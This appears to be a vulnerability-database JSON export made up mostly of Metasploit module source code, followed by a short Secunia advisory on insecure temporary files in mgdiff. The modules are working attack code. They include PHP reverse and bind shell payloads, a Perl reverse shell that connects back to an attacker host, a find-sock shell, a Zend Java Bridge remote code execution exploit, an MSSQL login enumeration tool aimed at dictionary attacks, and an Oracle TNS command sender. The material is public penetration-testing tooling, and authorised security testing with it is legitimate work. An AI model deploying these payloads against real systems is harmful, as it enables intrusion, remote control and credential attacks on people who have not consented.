{"metasploit": [{"lastseen": "2019-11-27T15:37:30", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\n", "modified": "2017-09-12T13:53:31", "published": "2015-05-18T07:49:34", "id": "MSF:PAYLOAD/PHP/METERPRETER/REVERSE_TCP_UUID", "href": "", "type": "metasploit", "title": "PHP Meterpreter, PHP Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/php/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1290\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::ReverseTcp\n\n def self.handler_type_alias\n \"reverse_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Reverse TCP Stager',\n 'Description' => 'Reverse PHP connect back stager with checks for disabled functions',\n 'Author' => [ 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => {'Payload' => \"\"}\n ))\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/reverse_tcp_uuid.rb"}, {"lastseen": "2019-12-12T03:48:32", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. 
Listen for a connection over IPv6 with UUID Support\n", "modified": "2017-09-12T13:53:31", "published": "2015-05-18T07:49:34", "id": "MSF:PAYLOAD/PHP/METERPRETER/BIND_TCP_IPV6_UUID", "href": "", "type": "metasploit", "title": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/php/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1511\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::BindTcp\n\n def self.handler_type_alias\n \"bind_tcp_ipv6_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager IPv6 with UUID Support',\n 'Description' => 'Listen for a connection over IPv6 with UUID Support',\n 'Author' => [ 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Stager' => { 'Payload' => \"\" }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb"}, {"lastseen": "2019-11-29T22:09:50", "bulletinFamily": "exploit", "description": "This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. 
This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-10T19:42:52", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_SQL_LOGINS", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration',\n 'Description' => %q{\n This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). 
Once logins have been enumerated, they can be used in dictionary attacks.\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 300]),\n ])\n end\n\n def run\n # Check connection and issue initial query\n print_status(\"Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...\")\n if mssql_login_datastore\n print_good('Connected.')\n else\n print_error('Login was unsuccessful. Check your credentials.')\n disconnect\n return\n end\n\n # Query for sysadmin status\n print_status(\"Checking if #{datastore['USERNAME']} has the sysadmin role...\")\n user_status = check_sysadmin\n\n # Check if user has sysadmin role\n if user_status == 1\n print_good(\"#{datastore['USERNAME']} is a sysadmin.\")\n else\n print_status(\"#{datastore['USERNAME']} is NOT a sysadmin.\")\n end\n\n # Get a list if sql server logins using SUSER_NAME()\n print_status(\"Setup to fuzz #{datastore['FuzzNum']} SQL Server logins.\")\n print_status('Enumerating logins...')\n sql_logins_list = get_sql_logins\n if sql_logins_list.nil? 
|| sql_logins_list.empty?\n print_error('Sorry, somethings went wrong - SQL Server logins were found.')\n disconnect\n return\n else\n # Print number of initial logins found\n print_good(\"#{sql_logins_list.length} initial SQL Server logins were found.\")\n\n sql_logins_list.sort.each do |sql_login|\n if datastore['VERBOSE']\n print_status(\" - #{sql_login}\")\n end\n end\n end\n\n # Verify the enumerated SQL Logins using sp_defaultdb error analysis\n print_status('Verifying the SQL Server logins...')\n sql_logins_list_verified = verify_logins(sql_logins_list)\n if sql_logins_list_verified.nil?\n print_error('Sorry, no SQL Server logins could be verified.')\n disconnect\n return\n else\n\n # Display list of verified SQL Server logins\n print_good(\"#{sql_logins_list_verified.length} SQL Server logins were verified:\")\n sql_logins_list_verified.sort.each do |sql_login|\n print_status(\" - #{sql_login}\")\n end\n end\n\n disconnect\n end\n\n # Checks if user is a sysadmin\n def check_sysadmin\n # Setup query to check for sysadmin\n sql = \"select is_srvrolemember('sysadmin') as IsSysAdmin\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse query results\n parse_results = result[:rows]\n status = parse_results[0][0]\n\n # Return status\n return status\n end\n\n # Enumerates SQL Server logins by fuzzing the principal_id passed to SUSER_NAME()\n def get_sql_logins\n # Create array to store the sql logins\n sql_logins = []\n\n # Fuzz the principal_id parameter passed to the SUSER_NAME function\n (1..datastore['FuzzNum']).each do |principal_id|\n # Setup query\n sql = \"SELECT SUSER_NAME(#{principal_id}) as login\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:rows]\n sql_login = parse_results[0][0]\n\n # Add to sql server login list\n sql_logins.push(sql_login) unless sql_logins.include?(sql_login)\n end\n\n # Return list of logins\n sql_logins\n end\n\n # Verifies which enumerated names are real SQL logins via sp_defaultdb error analysis\n def verify_logins(sql_logins_list)\n\n # Create array for 
later use\n verified_sql_logins = []\n\n fake_db_name = Rex::Text.rand_text_alpha_upper(24)\n\n # Check if the user has the db_owner role is any databases\n sql_logins_list.each do |sql_login|\n # Setup query\n sql = \"EXEC sp_defaultdb '#{sql_login}', '#{fake_db_name}'\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:errors]\n result = parse_results[0]\n\n # Check if sid resolved to a sql login\n if result.include?(fake_db_name)\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n\n # Check if sid resolved to a sql login\n if result.include?('alter the login')\n # Add sql server login to verified list\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n end\n\n verified_sql_logins\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb"}, {"lastseen": "2019-11-26T10:19:34", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn a command shell via php (IPv6)\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-31T07:11:55", "id": "MSF:PAYLOAD/PHP/BIND_PHP_IPV6", "href": "", "type": "metasploit", "title": "PHP Command Shell, Bind TCP (via php) IPv6", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Bind TCP (via php) IPv6',\n 'Description' => 'Listen for a connection and 
spawn a command shell via php (IPv6)',\n 'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>',],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # PHP Bind Shell\n #\n def php_bind_shell\n\n dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);\n shell = <<-END_OF_PHP_CODE\n #{php_preamble({:disabled_varname => dis})}\n $port=#{datastore['LPORT']};\n\n $scl='socket_create_listen';\n if(is_callable($scl)&&!in_array($scl,#{dis})){\n $sock=@$scl($port);\n }else{\n $sock=@socket_create(AF_INET6,SOCK_STREAM,SOL_TCP);\n $ret=@socket_bind($sock,0,$port);\n $ret=@socket_listen($sock,5);\n }\n $msgsock=@socket_accept($sock);\n @socket_close($sock);\n\n while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))\n {\n $o = '';\n $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);\n if(FALSE===$c){break;}\n if(substr($c,0,3) == 'cd '){\n chdir(substr($c,3,-1));\n } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n break;\n }else{\n #{php_system_block({:cmd_varname=>\"$c\", :output_varname=>\"$o\", :disabled_varname => dis})}\n }\n @socket_write($msgsock,$o,strlen($o));\n }\n @socket_close($msgsock);\n END_OF_PHP_CODE\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + php_bind_shell\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/bind_php_ipv6.rb"}, {"lastseen": "2019-11-27T14:55:01", "bulletinFamily": "exploit", "description": "This module abuses a flaw in the Zend Java Bridge Component of the Zend Server Framework. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. 
NOTE: This module has only been tested with the Win32 build of the software.\n", "modified": "2017-07-24T13:26:21", "published": "2011-04-01T22:01:46", "id": "MSF:AUXILIARY/ADMIN/ZEND/JAVA_BRIDGE", "href": "", "type": "metasploit", "title": "Zend Server Java Bridge Design Flaw Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',\n 'Description' => %q{\n This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.\n },\n 'Author' => [ 'ikki', 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '71420'],\n [ 'ZDI', '11-113' ],\n [ 'EDB', '17078' ],\n ],\n 'DisclosureDate' => 'Mar 28 2011'))\n\n register_options(\n [\n Opt::RPORT(10001),\n OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\\\metasploit.txt']),\n ])\n end\n\n def run\n\n cmd = datastore['CMD']\n\n connect\n\n java_object = [0x33000000].pack('V') + [0x00000000].pack('V')\n java_object << [0x0c000000].pack('V') + \"CreateObject\"\n java_object << [0x02000000].pack('V') + [0x00000004].pack('V')\n java_object << \"\\x11\" + \"java.lang.Runtime\" + \"\\x07\"\n java_object << [0x00000000].pack('V')\n\n print_status(\"Creating the Java Object 'java.lang.Runtime'\")\n sock.put(java_object)\n res = sock.get_once() || ''\n classid = res[5,4]\n\n runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')\n runtime << \"getRuntime\" + [0x00000000].pack('V')\n\n print_status(\"Invoking static method 
'getRuntime()'\")\n sock.put(runtime)\n res = sock.get_once() || ''\n methodid = res[5,4]\n\n exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid\n exec << [0x04000000].pack('V') + \"exec\" + [0x01000000].pack('V')\n exec << \"\\x04\" + [0x00].pack('n') + [cmd.length].pack('n') + cmd\n\n print_status(\"Invoking method 'exec()' with parameter '#{cmd}'\")\n sock.put(exec)\n success = sock.get_once() || ''\n if (success =~ /\\x00\\x00\\x00/)\n print_status(\"Cleaning up the JVM\")\n rm = [0x11000000].pack('V') + [0xffffffff].pack('V')\n rm << [0x05000000].pack('V') + \"reset\"\n rm << [0x00000000].pack('V')\n sock.put(rm)\n else\n print_error(\"Failed to run command...\")\n disconnect\n return\n end\n\n disconnect\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/zend/java_bridge.rb"}, {"lastseen": "2019-11-26T10:23:05", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. 
Reverse PHP connect back stager with checks for disabled functions\n", "modified": "2017-09-12T13:53:31", "published": "2010-06-23T22:24:50", "id": "MSF:PAYLOAD/PHP/METERPRETER/REVERSE_TCP", "href": "", "type": "metasploit", "title": "PHP Meterpreter, PHP Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/php/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1116\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::ReverseTcp\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Reverse TCP Stager',\n 'Description' => 'Reverse PHP connect back stager with checks for disabled functions',\n 'Author' => 'egypt',\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => {'Payload' => \"\"}\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/reverse_tcp.rb"}, {"lastseen": "2019-11-28T18:45:42", "bulletinFamily": "exploit", "description": "This module allows for the sending of arbitrary TNS commands in order to gather information. 
Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd\n", "modified": "2017-07-24T13:26:21", "published": "2009-07-14T16:48:56", "id": "MSF:AUXILIARY/ADMIN/ORACLE/TNSCMD", "href": "", "type": "metasploit", "title": "Oracle TNS Listener Command Issuer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TNS\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle TNS Listener Command Issuer',\n 'Description' => %q{\n This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd\n },\n 'Author' => ['MC'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Feb 1 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(1521),\n OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']),\n ])\n end\n\n def run\n\n begin\n connect\n\n command = datastore['CMD']\n\n pkt = tns_packet(command)\n\n print_status(\"Sending '#{command}' to #{rhost}:#{rport}\")\n sock.put(pkt)\n print_status(\"writing #{pkt.length} bytes.\")\n\n select(nil,nil,nil,0.5)\n\n print_status(\"reading\")\n res = sock.get_once(-1,5) || ''\n res = res.tr(\"[\\200-\\377]\",\"[\\000-\\177]\")\n res = res.tr(\"[\\000-\\027\\]\",\".\")\n res = res.tr(\"\\177\",\".\")\n print_status(res)\n\n disconnect\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n print_error e.message\n rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e\n print_error e.message\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/tnscmd.rb"}, {"lastseen": "2019-11-24T21:38:01", "bulletinFamily": 
"exploit", "description": "Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\n", "modified": "2017-07-24T13:26:21", "published": "2008-09-24T04:41:51", "id": "MSF:PAYLOAD/PHP/SHELL_FINDSOCK", "href": "", "type": "metasploit", "title": "PHP Command Shell, Find Sock", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\nrequire 'msf/core/handler/find_shell'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Find Sock',\n 'Description' => %Q{\n Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. 
Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.\n },\n 'Author' => [ 'egypt' ],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Handler' => Msf::Handler::FindShell,\n 'Session' => Msf::Sessions::CommandShell,\n 'Arch' => ARCH_PHP\n ))\n end\n\n def php_findsock\n\n var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n shell = <<END_OF_PHP_CODE\n#{php_preamble}\nprint(\"<html><body>\");\nflush();\n\nfunction mysystem(#{var_cmd}){\n #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}\n return #{var_out};\n}\n\n#{var_fd} = 13;\nfor ($i = 3; $i < 50; $i++) {\n $foo = mysystem(\"/bin/bash 2>/dev/null <&$i -c 'echo $i'\");\n if ($foo != $i) {\n #{var_fd} = $i - 1;\n break;\n }\n}\nprint(\"</body></html>\\n\\n\");\nflush();\n\n#{var_cmd} = \"/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}\";\nmysystem(#{var_cmd});\n\nEND_OF_PHP_CODE\n\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return php_findsock\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/shell_findsock.rb"}, {"lastseen": "2019-11-17T21:20:53", "bulletinFamily": "exploit", "description": "Creates an interactive shell via perl\n", "modified": "2017-07-24T13:26:21", "published": "2006-12-17T07:57:51", "id": "MSF:PAYLOAD/PHP/REVERSE_PERL", "href": "", "type": "metasploit", "title": "PHP Command, Double Reverse TCP Connection (via Perl)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule 
MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command, Double Reverse TCP Connection (via Perl)',\n 'Description' => 'Creates an interactive shell via perl',\n 'Author' => 'cazz',\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Constructs the payload\n #\n def generate\n buf = \"#{php_preamble}\"\n buf += \"$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');\"\n buf += \"#{php_system_block({:cmd_varname=>\"$c\"})}\"\n return super + buf\n\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n lhost = datastore['LHOST']\n ver = Rex::Socket.is_ipv6?(lhost) ? 
\"6\" : \"\"\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n cmd = \"perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\\"#{lhost}:#{datastore['LPORT']}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/reverse_perl.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nmgdiff Patch Viewer Insecure Temporary File Creation\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17299\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17299/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nPrivilege escalation\r\n\r\nWHERE:\r\nLocal system\r\n\r\nSOFTWARE:\r\nmgdiff Patch Viewer\r\nhttp://secunia.com/product/5962/\r\n\r\nDESCRIPTION:\r\nJavier Fernandez-Sanguino Pena has reported a vulnerability in mgdiff\r\nPatch Viewer, which can be exploited by malicious, local users to\r\nperform certain actions on a vulnerable system with escalated\r\nprivileges.\r\n\r\nThe vulnerability is caused due to "viewpatch" script creating\r\ntemporary files insecurely in "/tmp". 
This can be exploited via\r\nsymlink attacks to create or overwrite arbitrary files with the\r\nprivileges of the user running the affected script.\r\n\r\nSOLUTION:\r\nGrant only trusted users access to affected systems.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nJavier Fernandez-Sanguino Pena\r\n\r\nORIGINAL ADVISORY:\r\nDebian:\r\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=335188\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keep their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-10-24T00:00:00", "published": "2005-10-24T00:00:00", "id": "SECURITYVULNS:DOC:10012", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10012", "title": "[SA17299] mgdiff Patch Viewer Insecure Temporary File Creation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}